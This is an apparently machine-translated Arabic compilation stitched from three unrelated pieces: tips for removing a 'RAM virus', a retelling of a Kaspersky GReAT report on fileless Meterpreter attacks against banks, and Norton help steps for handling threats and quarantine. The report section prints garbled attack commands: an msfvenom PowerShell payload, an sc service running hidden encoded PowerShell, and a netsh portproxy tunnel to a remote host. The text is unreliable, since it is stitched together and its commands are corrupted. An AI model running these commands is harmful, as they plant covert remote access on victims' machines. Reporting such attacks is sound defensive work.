فيروس في ذاكرة الوصول العشوائي، هذه الظاهرة مزعجة للغاية ولسوء الحظ ليست نادرة. غالبًا ما نرى ملفًا مخفيًا ولكن لا يمكننا حذفه بأي شكل من الأشكال - يستمر في الظهور والظهور ، أو نظام التشغيل نفسه نظام ويندوزلا يسمح بذلك.
بالمناسبة ، فإنه يتجلى في كثير من الأحيان في الحالات الإعداد الخاطئمضاد للفيروسات أو عدمه. إذا كان لديك مثل هذا الموقف ، فأوصيك بقراءة المقالة - تثبيت وتكوين برنامج مكافحة فيروسات على Windows. قبل إزالة فيروس من ذاكرة الوصول العشوائي ، يجب عليك معرفة ما يحدث مع برنامج مكافحة الفيروسات المثبت على جهاز الكمبيوتر الخاص بك. على الأرجح ، تم "تدمير" برنامج مكافحة الفيروسات الخاص بك بواسطة فيروس ظهر. ومن المحتمل أيضًا أنه في ترسانة التوقيع الخاصة ببرنامج مكافحة الفيروسات الخاص بك لا توجد طريقة لمحو الفيروس تمامًا من المجموعة في الوقت المناسب ويحاول البرنامج فقط إزالة عدوى الفيروس ، وليس الفيروس نفسه.
غالبًا ما تكون هناك مواقف يقوم فيها فيروس بنقل برامج وملفات إضافية لعمله الخاص ، أو يبدأ العمل تلقائيًا ، والآن سيكتشف برنامج مكافحة الفيروسات هذه النسخ ، لكنه لن يكتشف الكود المصدري (الفيروس) ، وفي معظم الحالات لا يمكنه التعامل معه هو - هي.
- نقوم بإزالة (باستخدام برنامج إلغاء التثبيت - إضافة / إزالة البرامج) برنامج مكافحة الفيروسات المثبت ، فهو عديم الفائدة هنا.
- قم بتنزيل Ccleaner من الإنترنت وتثبيته. لنبدأ ، أولاً نقوم بمسح المجلدات المؤقتة. هذا البرنامج مناسب للمستخدمين العاديين ، لذلك من الممكن تحديد جميع المربعات في الإعدادات - لن يمحو بيانات المستخدم! لقد كتبت المزيد عن البرنامج في المقالة - تنظيف السجل.
- ثم نحتاج إلى أداة تنظيف الفيروسات لمساعدتنا. لقد كتبت عنها في المقال - أدوات مجانية لإزالة الفيروسات. نختار أي. على سبيل المثال ، قم بتنزيل برنامج Dr.web Cure it من الإنترنت وتثبيته.
- نقوم بتثبيت التحديث وتشغيل أحد عمليتي الفحص (سريع أو كامل). المسح السريع يعطي نتيجة فعالة من حيث المبدأ. يتم إزالة جميع الفيروسات التي تم اكتشافها. نعيد تشغيل الكمبيوتر.
- تنزيل برنامج مكافحة فيروسات جديد. مهم بشكل أساسي! إذا تم تثبيت برنامج مكافحة الفيروسات Eset NOD32 antivirus قبل حدوث مشكلة ، فقم بتثبيت Avast أو Avira ، إذا تم تثبيت Avast أو تثبيت Eset أو أي برنامج مكافحة فيروسات آخر من اختيارك.
- من السهل جدًا تفسير مثل هذه الإجراءات ، برنامج مكافحة الفيروسات الذي من المحتمل أن يكون قد تعرض للتلف ، وقد تظل البيانات الموجودة في السجل ، وهذا سيؤدي إلى تشغيل غير دقيق لبرنامج مكافحة الفيروسات ، خاصة وأن برنامج مكافحة الفيروسات هذا لم يجد تهديد من الإنترنت على جهاز الكمبيوتر الخاص بك.
حول حملة برمجيات خبيثة جديدة ومثيرة للاهتمام أثرت على البنوك وشركات الاتصالات والوكالات الحكومية ، بالإضافة إلى شركات ومؤسسات أخرى في أكثر من أربعين دولة حول العالم.
يكتب المحللون في فريق GReAT أن فريق أمان البنك كان أول من لاحظ التهديد: ثم تم العثور على كود Meterpreter في الذاكرة الفعلية لوحدة التحكم بالمجال. تتعرف منتجات Kaspersky Lab على مشكلات مثل MEM: Trojan.Win32.Cometer و MEM: Trojan.Win32.Metasploit. عندما بدأ المحللون في البحث عن مصدر الشفرة في الذاكرة ، وجدوا أيضًا نصوص PowerShell النصية في سجل Windows ، وأداة NETSH ، التي تم استخدامها لتوجيه حركة المرور عبر نفق إلى خادم الأوامر والتحكم للمهاجمين.
تسمى مثل هذه الهجمات "بدون ملفات" (fileless) ، أي أن البرامج الضارة لا تضع أي ملفات على القرص الصلب ، وبدلاً من ذلك يتم تضمين الحمولة في الذاكرة مباشرةً وتوجد داخل ذاكرة الوصول العشوائي. بالطبع ، من الصعب للغاية اكتشاف مثل هذا الهجوم وتعقبه.
مخطط الهجوم
يوضح الباحثون أنه يمكن استخدام إطار عمل Metasploit المعروف على نطاق واسع لإنشاء نصوص ، كما في المثال أدناه.
نصوص مثل هذه تساعد على حقن Meterpreter في ذاكرة الوصول العشوائي. يمكن استخدام Msfvenom من Metasploit لتوليدها:
msfvenom -p windows / meterpreter / bind_hidden_tcp AHOST = 10.10.1.11 -f psh-cmd
بمجرد إنشاء البرنامج النصي ، يستخدم المهاجمون Windows SC لتثبيت خدمة ضارة على المضيف الهدف (والذي سينفذ في النهاية البرنامج النصي أعلاه). يمكن القيام بذلك ، على سبيل المثال ، باستخدام الأمر التالي:
sc \\ target_name قم بإنشاء ATITscUA binpath = "C: \ Windows \ system32 \ cmd.exe / b / c start / b / min powershell.exe -nop -w hidden e aQBmACgAWwBJAG4AdABQAHQA…" بدء = يدوي
الخطوة التالية هي إعداد النفق بحيث يصبح الجهاز المصاب متاحًا للمضيف البعيد. للقيام بذلك ، يلجأ المهاجمون إلى الأمر التالي:
netsh واجهة portproxy إضافة v4tov4 listenport = 4444 connectaddress = 10.10.1.12 connectport = 8080 listenaddress = 0.0.0.0
نتيجة لذلك ، ستتم إعادة توجيه كل حركة مرور الشبكة من 10.10.1.11:4444 إلى 10.10.1.12:8080. تسمح لك هذه التقنية بإعداد نفق وكيل يمكن من خلاله للمجرمين التحكم عن بعد في مضيف PowerShell مصاب.
يلاحظ المحللون أن استخدام SC و NETSH يتطلب امتيازات المسؤول على المضيف المحلي والبعيد. سيتطلب استخدام البرامج النصية الخبيثة من PowerShell أيضًا تصعيد الامتياز وإجراء تغييرات على سياسة التنفيذ. للقيام بذلك ، يستخدم المهاجمون أداة تفريغ بيانات اعتماد Mimikatz لجمع كلمات المرور من الحسابات على الجهاز المحلي ومحطات العمل المحيطة.
بعد دراسة دقيقة للهجوم على أحد البنوك المتضررة ، توصل الباحثون إلى استنتاج مفاده أن مشغلي هذه الحملة استخدموا نطاقات المستوى الثالث ، بالإضافة إلى مجالات في مناطق .GA ، .ML ، .CF. الحقيقة هي أن مثل هذه المجالات مجانية ، مما يعني أن المهاجمين لا يتركون وراءهم معلومات WHOIS.
تلخيص كل ما سبق (باستخدام Metasploit و المرافق القياسية Windows ، المجالات التي لا تحتوي على معلومات WHOIS) ، خلص الباحثون إلى أن الكتابة اليدوية للمهاجمين غير المعروفين تشبه إلى حد بعيد عمل مجموعات مثل GCMAN و Carbanak. ومع ذلك ، لا يوجد دليل مباشر ، لذا فإن ربط هذه الهجمات الصامتة بأي مجموعة معينة غير ممكن.
أصبحت تقنيات مثل تلك الموصوفة في هذا التقرير أكثر شيوعًا ، خاصة [عند تنفيذ الهجمات] ضد أهداف كبيرة في الصناعة المصرفية. لسوء الحظ ، فإن استخدام الأدوات البسيطة ، جنبًا إلى جنب مع الحيل المختلفة ، يجعل من الصعب للغاية اكتشاف [مثل هذه الهجمات] ، يلخص خبراء GReAT.
عندما يكتشف Norton تهديدًا ، يقوم البرنامج بإزالته تلقائيًا ، ما لم يكن تدخلك ضروريًا لتحديد كيفية التعامل مع التهديد. في مثل هذه الحالات ، يعرض Norton إشعار "تم اكتشاف تهديدات" أو "تهديد أمان" مع الخيارات المتاحة للرد على التهديد.
اعرض التهديدات التي تم حلها تلقائيًا أثناء الفحص
قم بتشغيل Norton.
أمان الجهاز، انقر فوق فتح.
فى الشباك سجل الأمان التهديدات الأمنية التي تم حلها.
حدد تهديدًا من القائمة واعرض الإجراءات المكتملة في لوحة التفاصيل.
في بعض الحالات ، بدلاً من الإصلاح التلقائي للتهديد ، يوصي Norton بأن تتخذ إجراءً محددًا لإصلاحه.
إصلاح التهديدات التي لم يتم إصلاحها أثناء الفحص
قم بتشغيل Norton.
إذا ظهرت نافذة My Norton بجوار ملف أمان الجهاز، انقر فوق فتح.
في نافذة Norton الرئيسية ، انقر نقرًا مزدوجًا فوق الأمان ثم حدد المحفوظات.
فى الشباك سجل الأمانفي قائمة العرض ، حدد التهديدات الأمنية التي لم يتم حلها.
إذا كانت القائمة تحتوي على تهديدات لم يتم حلها ، فحدد التهديد الذي تهتم به.
إذا كان هناك سبب للاعتقاد بأن النظام مصاب ، فقم بتشغيل Norton Power Eraser. Norton Power Eraser هي أداة قوية لإزالة البرامج الضارة للتخلص من التهديدات الأمنية الأكثر مقاومة. لمزيد من المعلومات ، راجع تشغيل Norton Threat Scan على جهاز الكمبيوتر الخاص بك
Norton Power Eraser هي أداة لإزالة البرامج الضارة تعمل في الوضع العدواني. في بعض الأحيان ، جنبًا إلى جنب مع البرامج الضارة ، يمكن لـ Norton Power Eraser إزالة الملفات الشرعية ، لذا قم بمراجعة نتائج الفحص بعناية قبل حذف أي ملفات.
بشكل افتراضي ، يزيل Norton تهديدات الأمان من جهاز الكمبيوتر الخاص بك ويعزلها. إذا كان هناك سبب للاعتقاد بأن الملف قد تم حذفه عن طريق الخطأ ، فيمكن عندئذٍ استعادته من العزل إلى موقعه الأصلي واستبعاده من عمليات الفحص اللاحقة.
استعادة ملف من العزل
قم بتشغيل Norton.
إذا ظهرت نافذة My Norton بجوار ملف أمان الجهاز، انقر فوق فتح.
في نافذة Norton الرئيسية ، انقر فوق الأمان ، ثم حدد المحفوظات.
فى الشباك سجل الأمانقم بتوسيع قائمة العرض وحدد خيار العزل.
حدد الملف المراد استعادته.
في لوحة التفاصيل ، انقر فوق الخيارات.
فى الشباك التهديد المكتشفاختر فريقًا استعادة واستبعاد هذا الملف.
فى الشباك التعافي من الحجر الصحيانقر فوق الزر "نعم".
في نافذة الاستعراض بحثًا عن مجلد ، حدد مجلدًا أو محرك أقراص لوضع الملف المستعاد ، ثم انقر فوق موافق.
